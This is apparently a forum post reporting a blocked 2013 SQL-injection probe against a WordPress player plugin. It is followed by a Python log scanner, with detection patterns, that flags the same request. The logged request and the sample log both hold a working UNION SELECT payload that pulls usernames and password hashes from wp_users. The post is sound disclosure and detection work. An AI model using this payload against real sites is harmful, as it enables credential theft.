I don’t use this plugin for my own site, but I found this line in my server log today:
27.155.*.* - - [26/Apr/2013:21:36:44 +0000] "GET /wp-content/plugins/player/settings.php?playlist=2&theme=-1+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users-- HTTP/1.0" 403 1090 "-" "-"
Clearly, someone tried to exploit WordPress using this plugin so that a list of users and passwords would get returned. I don’t know if this vulnerability has been fixed already, I just wanted to make sure it doesn’t go unnoticed in any case.
The request was blocked by Bad Behavior for “URL pattern found on blacklist”; the assault came from China.
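As an added example, not code from the original post, from the plugin, or from Bad Behavior: a small log scanner that parses Apache access-log lines, URL-decodes each query parameter and flags the signatures that make up the request above (UNION SELECT, group_concat(), a 0x hex separator, FROM wp_users, and a trailing comment terminator). The sample log is constructed here: the first line is the request from the post with the IP left masked as the poster masked it, the second is an invented benign request to the same script. The rule that a request must match at least two distinct signatures before it is reported is an assumption chosen to keep single-keyword false positives (a search for the word "union", say) out of the output.

```python
import re
import urllib.parse
from dataclasses import dataclass, field

# Apache common/combined log prefix: host ident user [time] "method target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Signatures checked against each decoded, lower-cased, whitespace-collapsed parameter value.
# Together they describe the UNION-based extraction attempt seen in the log line in the post.
SQLI_PATTERNS = {
    "union_select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b"),
    "group_concat": re.compile(r"\bgroup_concat\s*\("),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{2,}\b"),        # 0x3a is ':' used as a login:hash separator
    "from_wp_users": re.compile(r"\bfrom\s+wp_users\b"),     # targets the WordPress users table
    "comment_terminator": re.compile(r"(?:--|#|/\*)\s*$"),   # trailing comment discards the real query tail
}


@dataclass
class Finding:
    host: str
    status: int
    path: str
    hits: list = field(default_factory=list)  # "param:signature" pairs

    @property
    def blocked(self):
        # 403 means the server (Bad Behavior in the post) refused the request before the plugin ran
        return self.status == 403


def _normalise(value):
    return re.sub(r"\s+", " ", value).strip().lower()


def analyse_line(line):
    """Return a Finding for one Apache log line, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urllib.parse.urlsplit(m.group("target"))
    # parse_qs percent-decodes and turns '+' into spaces, which is how the payload was encoded
    params = urllib.parse.parse_qs(url.query, keep_blank_values=True)
    finding = Finding(host=m.group("host"), status=int(m.group("status")), path=url.path)
    for name, values in params.items():
        for value in values:
            norm = _normalise(value)
            for label, pattern in SQLI_PATTERNS.items():
                if pattern.search(norm):
                    finding.hits.append(f"{name}:{label}")
    return finding


def scan(lines):
    """Yield findings that match at least two distinct signatures (assumed threshold, see lead-in)."""
    for line in lines:
        f = analyse_line(line)
        if f is not None and len({h.split(":")[1] for h in f.hits}) >= 2:
            yield f


# Constructed sample log: the request from the post (IP masked as in the post) plus a benign request.
SAMPLE_LOG = [
    '27.155.*.* - - [26/Apr/2013:21:36:44 +0000] "GET /wp-content/plugins/player/settings.php'
    '?playlist=2&theme=-1+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,'
    '11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,'
    '43,44,45,46,47,48,49,50,51,52+from+wp_users-- HTTP/1.0" 403 1090 "-" "-"',
    '192.0.2.10 - - [26/Apr/2013:21:40:02 +0000] "GET /wp-content/plugins/player/settings.php'
    '?playlist=2&theme=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f.host, f.path, "blocked" if f.blocked else "SERVED", sorted(f.hits))
```

The status code matters as much as the payload: a 403 like the one in the post shows the probe was stopped, while the same request logged with a 200 would mean the plugin handled it and the installed version should be checked against the plugin's changelog.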